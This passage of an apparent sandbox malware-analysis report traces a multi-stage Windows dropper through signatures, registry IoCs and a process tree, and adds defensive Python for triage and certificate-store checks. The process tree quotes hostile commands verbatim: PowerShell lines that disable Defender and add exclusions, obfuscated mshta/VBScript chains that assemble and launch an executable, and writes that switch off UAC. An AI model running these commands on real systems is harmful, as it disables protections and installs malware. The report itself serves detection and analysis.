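    RegEvent("46puvSQnm9v3JLD7WOWMRWFL.exe", "SetValue", D + r"\Exclusions\Paths\C:\Users\Public\Documents\03B82AA2\svchost.exe", "0"),
    RegEvent("46puvSQnm9v3JLD7WOWMRWFL.exe", "SetValue", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA", "0"),
    RegEvent("RuntimeBroker.exe", "SetValue", SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate", r"C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe"),
    RegEvent("control.exe", "SetValue", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\NPRPDXW", r"C:\Program Files (x86)\Mrbnhc\xfatghhxptwtr.exe"),
    RegEvent("F37OFtk5v9UdORoY8t4Donzo.exe", "QueryValue", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion"),
    RegEvent("explorer.exe", "SetValue", SID + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1"),
    RegEvent("9Zb2WtRSw11ACQNzk2XLqI6n.exe", "QueryValue", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.category:18} {f.process}: {f.detail}")
```

Dropping WOW6432Node during normalisation is deliberate: it lets one rule match writes from 32-bit and 64-bit processes alike, while the raw path is still available in the event if you need to argue, as above, that a redirected write never reached the 64-bit Defender service.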
Enumerates connected drives  3 TTPs  64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes (File opened (read-only), three msiexec.exe and two installer.exe instances):
msiexec.exe (34 opens):   B: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y:
installer.exe (30 opens): A: B: E: F: G: H: I: J: L: M: O: Q: R: S: T: U: V: W: X: Y: Z:
Walking every drive letter is normal for Windows Installer (it resolves volumes while costing an install), so on its own this signature carries little weight here.

Legitimate hosting services abused for malware hosting/C2  1 TTPs

Looks up external IP address via web service  17 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
ioc         flows
ipinfo.io   2, 47, 49, 138, 154, 161, 193, 202, 209, 297, 310, 360, 378, 389, 395, 403
ip-api.com  2
Suspicious use of NtSetInformationThreadHideFromDebugger 27 IoCs
Processes:
-
Suspicious use of SetThreadContext 17 IoCs
Processes:
-
Drops file in Program Files directory 23 IoCs
Processes:
-
Drops file in Windows directory 36 IoCs
Processes:
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 64 IoCs
Processes:
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 024wC3SO_qVtbE4Y9Lz5RQz9.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 024wC3SO_qVtbE4Y9Lz5RQz9.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 024wC3SO_qVtbE4Y9Lz5RQz9.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E26D.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E26D.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E26D.exe
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid process
6380 schtasks.exe
6568 schtasks.exe
6892 schtasks.exe
6552 schtasks.exe
3596 schtasks.exe
-
Delays execution with timeout.exe 1 IoCs
Processes:
pid process
7288 timeout.exe
-
Enumerates system info in registry 2 TTPs 64 IoCs
Processes:
-
Kills process with taskkill 10 IoCs
Processes:
pid process
3472 taskkill.exe
5412 taskkill.exe
31496 taskkill.exe
5548 taskkill.exe
32368 taskkill.exe
5600 taskkill.exe
6920 taskkill.exe
3792 taskkill.exe
3732 taskkill.exe
4060 taskkill.exe
-
Processes:
description ioc process
Key created \Registry\User\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 control.exe
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AsyncTextService_8wekyb3d8bbwe%5Cresources.pri\1d75a039a93b17 compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.BioEnrollment_cw5n1h2txyewy%5Cresources.pri\1d781d323729775\a37dfe62\@{C:\Windows\SystemApps\Microsoft.BioEnrollment_cw5n1h2txyewy\resources.pri? ms-reso = "Windows Hello Setup" compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d75a032a505f68\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Win32WebViewHost_cw5n1h2txyewy\resources.pri? m = "Desktop App Web Viewer" compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\1d75a0311147cb\a37dfe62\@{C:\Windows\SystemApps\ParentalControls_cw5n1h2txyewy\resources.pri? ms-resource:///resourc = "Microsoft family features" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri\1d75a03421c99da\a37dfe62 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates svchost.exe -
Modifies registry class 7 IoCs
Processes:
- Explorer.EXE: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
- Explorer.EXE: Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
- Calculator.exe: Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{86D0A433-217B-4728-8E4C-E642625EF2A4}
- Explorer.EXE: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
- Explorer.EXE: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\
- Explorer.EXE: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\
- Calculator.exe: Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{D6D02056-CE11-40F8-8D38-D6FA4D12219D}
Processes:
installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d31243
0220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 installer.exe -
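The entry above records installer.exe writing a certificate Blob under SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43. In that store layout the key name is the SHA-1 thumbprint of the certificate, and the Blob is a sequence of CAPI property records, each <propid u32><reserved u32 = 1><length u32><data>: the page's hex begins with such a record (19000000 01000000 10000000 ...), the record tagged 03 carries the 20-byte SHA-1, the record tagged 0b carries the UTF-16 friendly name "DigiCert", and the record tagged 20 (= 32, CERT_CERT_PROP_ID, length 0x3bb) carries the DER certificate, whose subject reads "DigiCert Assured ID Root CA". That is a public root, consistent with the Windows AuthRoot auto-update rather than a planted trust anchor, but the check a responder wants is mechanical: does the embedded DER actually hash to the key name? The parser below is an added example written for this report, not code from the sandbox or the sample; the demo blob and FAKE_DER are constructed. To check the page's entry, pass bytes.fromhex() of the Blob hex and the key name to verify_authroot_entry().

```python
"""Parse a CAPI certificate-store registry Blob and check it against its key name.

Added example for this report, not code from the sandbox or the sample.  Assumed
layout: the serialized CERT_CONTEXT property records crypt32 writes under
SystemCertificates\\<store>\\Certificates\\<sha1>\\Blob, i.e. a sequence of
<propid u32><reserved u32 = 1><length u32><data>.  The demo blob is constructed."""
import hashlib
import struct

# Property identifiers from wincrypt.h that matter for this check.
CERT_SHA1_HASH_PROP_ID = 3               # 20-byte thumbprint
CERT_FRIENDLY_NAME_PROP_ID = 11          # UTF-16LE, NUL-terminated
CERT_KEY_IDENTIFIER_PROP_ID = 20         # subject key identifier
CERT_CERT_PROP_ID = 32                   # the DER-encoded certificate itself
CERT_AUTH_ROOT_SHA256_HASH_PROP_ID = 98  # SHA-256 stored for AuthRoot entries


def parse_cert_blob(blob: bytes) -> dict:
    """Walk the property records and return {propid: data}; raise on a malformed blob."""
    props = {}
    off = 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError("truncated record header at offset %d" % off)
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1 or off + length > len(blob):
            raise ValueError("bad record for property %d" % prop_id)
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def friendly_name(props: dict) -> str:
    """Decode the friendly-name property (UTF-16LE with a trailing NUL)."""
    return props.get(CERT_FRIENDLY_NAME_PROP_ID, b"").decode("utf-16-le").rstrip("\0")


def verify_authroot_entry(key_name: str, blob: bytes) -> bool:
    """True only if the embedded DER cert hashes to the key name and to the stored SHA-1.

    A mismatch means a corrupted blob or a certificate that was not filed under its
    own thumbprint, which is what a hand-planted root would look like."""
    props = parse_cert_blob(blob)
    der = props.get(CERT_CERT_PROP_ID)
    if der is None:
        return False
    sha1 = hashlib.sha1(der).digest()
    return sha1.hex().upper() == key_name.upper() and props.get(CERT_SHA1_HASH_PROP_ID) == sha1


def build_blob(der: bytes, name: str) -> bytes:
    """Constructed blob for the demo; a real store entry carries more properties."""
    def rec(pid: int, data: bytes) -> bytes:
        return struct.pack("<III", pid, 1, len(data)) + data
    return (rec(CERT_SHA1_HASH_PROP_ID, hashlib.sha1(der).digest())
            + rec(CERT_FRIENDLY_NAME_PROP_ID, name.encode("utf-16-le") + b"\0\0")
            + rec(CERT_CERT_PROP_ID, der))


# Constructed stand-in for a certificate: not real DER, just bytes to hash and carry.
FAKE_DER = b"\x30\x82\x01\x00" + bytes(range(256))


def demo() -> tuple:
    """Return (genuine entry verifies, tampered entry verifies)."""
    blob = build_blob(FAKE_DER, "Example Root")
    thumb = hashlib.sha1(FAKE_DER).hexdigest().upper()
    # Swap one byte of the certificate body but keep the stored hash and key name:
    # the recomputed thumbprint no longer matches either of them.
    tampered = blob.replace(FAKE_DER, FAKE_DER[:-1] + b"\x00")
    return verify_authroot_entry(thumb, blob), verify_authroot_entry(thumb, tampered)


if __name__ == "__main__":
    print(demo())  # (True, False)
```

Run against a live system, the same check over every subkey of AuthRoot\Certificates and Root\Certificates in both HKLM and HKCU is a cheap way to spot a root that a dropper filed by hand; a genuine crypt32 write always agrees with its key name.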
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
- 3096 powershell.exe (3 entries)
- 3992 powershell.exe (2 entries)
- 1456 Sun038db98f99bf9a.exe (the remaining 59 entries)
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
- 3232 Explorer.EXE
- 17280 RuntimeBroker.exe
- 20680 QUKHyXjH3qRKVkqx.exe
Suspicious behavior: MapViewOfSection 12 IoCs
Processes:
- 4716 dyEvj3hC2t7OMuwoWXdKUmK3.exe (3 entries)
- 5248 nxfL7_6XSgUfDUVDEan06Mbe.exe (3 entries)
- 5328 024wC3SO_qVtbE4Y9Lz5RQz9.exe (1 entry)
- 3940 control.exe (4 entries)
- 1440 E26D.exe (1 entry)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
Processes:
- 7160 msedge.exe (all 64 entries)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
- 1708 svchost.exe: SeShutdownPrivilege, SeCreatePagefilePrivilege, SeShutdownPrivilege, SeCreatePagefilePrivilege, SeShutdownPrivilege, SeCreatePagefilePrivilege
- 1452 svchost.exe: SeShutdownPrivilege, SeCreatePagefilePrivilege
- 4064 Sun03d477f1a31.exe: SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 31, 32, 33, 34, 35
  (every privilege LUID from SeCreateTokenPrivilege upward, enabled in numeric order; 31 to 35 are left unnamed by the report and correspond in winnt.h to SeTrustedCredManAccessPrivilege, SeRelabelPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege. A token call that enables everything at once is a common unpacker/loader habit and an easy hunting signature.)
- 3096 powershell.exe: SeDebugPrivilege
- 3992 powershell.exe: SeDebugPrivilege
- 812 Sun03ea09aa5c9686e5.exe: SeDebugPrivilege
- 3652 Sun0328255c4bce6fb.exe: SeDebugPrivilege
- 5600 taskkill.exe: SeDebugPrivilege
- 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe: SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege
  (the same enable-everything sequence; the report lists at most 64 entries per section, so it stops here)
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
- 5312 colorcpl.exe
- 7160 msedge.exe
- 33668 installer.exe
- 3232 Explorer.EXE
- 32860 Calculator.exe
- 49056 installer.exe
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
- 3232 Explorer.EXE (all 64 entries)
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
- 29656 cmd.exe
- 31380 cmd.exe
- 8384 cmd.exe
- 9012 cmd.exe
- 17280 RuntimeBroker.exe (2 entries)
- 49772 cmd.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
(source pid and image -> target pid and image; count of recorded writes in parentheses)
- 812 setup_x86_x64_install.exe -> 2172 setup_installer.exe (3)
- 2172 setup_installer.exe -> 5056 setup_install.exe (3)
- 1452 svchost.exe -> 4880 MoUsoCoreWorker.exe (2)
- 5056 setup_install.exe -> 1592 cmd.exe (3)
- 5056 setup_install.exe -> 2912 cmd.exe (3)
- 1592 cmd.exe -> 3096 powershell.exe (3)
- 5056 setup_install.exe -> 3200 cmd.exe (3)
- 5056 setup_install.exe -> 3424 cmd.exe (3)
- 5056 setup_install.exe -> 3720 cmd.exe (3)
- 2912 cmd.exe -> 3992 powershell.exe (3)
- 5056 setup_install.exe -> 4120 cmd.exe (3)
- 5056 setup_install.exe -> 2992 cmd.exe (3)
- 5056 setup_install.exe -> 924 cmd.exe (3)
- 5056 setup_install.exe -> 3904 cmd.exe (3)
- 5056 setup_install.exe -> 1908 cmd.exe (3)
- 5056 setup_install.exe -> 2916 cmd.exe (3)
- 3200 cmd.exe -> 4064 Sun03d477f1a31.exe (3)
- 5056 setup_install.exe -> 808 cmd.exe (3)
- 5056 setup_install.exe -> 1512 cmd.exe (3)
- 5056 setup_install.exe -> 4108 cmd.exe (3)
- 3720 cmd.exe -> 4088 Sun039750b00c.exe (3)
- 3424 cmd.exe -> 3324 Sun033e271e0ce96c08.exe (2)
System policy modification 1 TTPs 2 IoCs
Processes:
- 46puvSQnm9v3JLD7WOWMRWFL.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
- 8CD8CA21.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
(EnableLUA = 0 switches User Account Control off machine-wide; the value is read at boot, so the change takes effect after the next restart, which leaves a window in which the host is still protected and the write can be reverted.)
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03d477f1a31.exeSun03d477f1a31.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4064 -s 20407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun033e271e0ce96c08.exeSun033e271e0ce96c08.exe /mixone6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 2407⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun039750b00c.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun039750b00c.exeSun039750b00c.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL").rUn("cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun039750b00c.exe"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if """" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun039750b00c.exe"") do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ))7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun039750b00c.exe" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI &if "" == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun039750b00c.exe") do taskkill -Im "%~Nxm" /F8⤵
-
C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exEWXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL").rUn("cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if ""-PRt0qXDI7zI "" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"") do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ))10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI &if "-PRt0qXDI7zI " == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE") do taskkill -Im "%~Nxm" /F11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: CLOse(CReAteoBjECt ( "wScrIPT.SHeLL"). RuN ( "CmD /C EcHo | sEt /P = ""MZ"" > QKYLkI3.T & CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X + 52TbWL.SZV + Y4JTKX.X9 +88N4.I +xU3XyT.P UKHPFGIw.UMV & START msiexec.exe -Y .\UKHPfGIw.UMV " , 0, TRUe ))10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EcHo | sEt /P = "MZ" > QKYLkI3.T& CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X+52TbWL.SZV +Y4JTKX.X9 +88N4.I +xU3XyT.P UKHPFGIw.UMV& START msiexec.exe -Y .\UKHPfGIw.UMV11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>QKYLkI3.T"12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "12⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -Y .\UKHPfGIw.UMV12⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "Sun039750b00c.exe" /F9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0324aba28588c0.exeSun0324aba28588c0.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 2407⤵
- Program crash
-
Level 5 process: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe

Level 6 process: C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun038aa349e3318e.exe
  Command line: Sun038aa349e3318e.exe
  - Executes dropped EXE

Level 7 process: C:\Users\Admin\Pictures\Adobe Films\tv3K6hSK60TEWOTPIZxPD0z1.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\tv3K6hSK60TEWOTPIZxPD0z1.exe"
  - Executes dropped EXE

Level 7 process: C:\Users\Admin\Pictures\Adobe Films\hgmCgKLLp6_aBM_p6OXdxhM4.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\hgmCgKLLp6_aBM_p6OXdxhM4.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext

Level 8 process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 152
  - Program crash
  - Checks processor information in registry
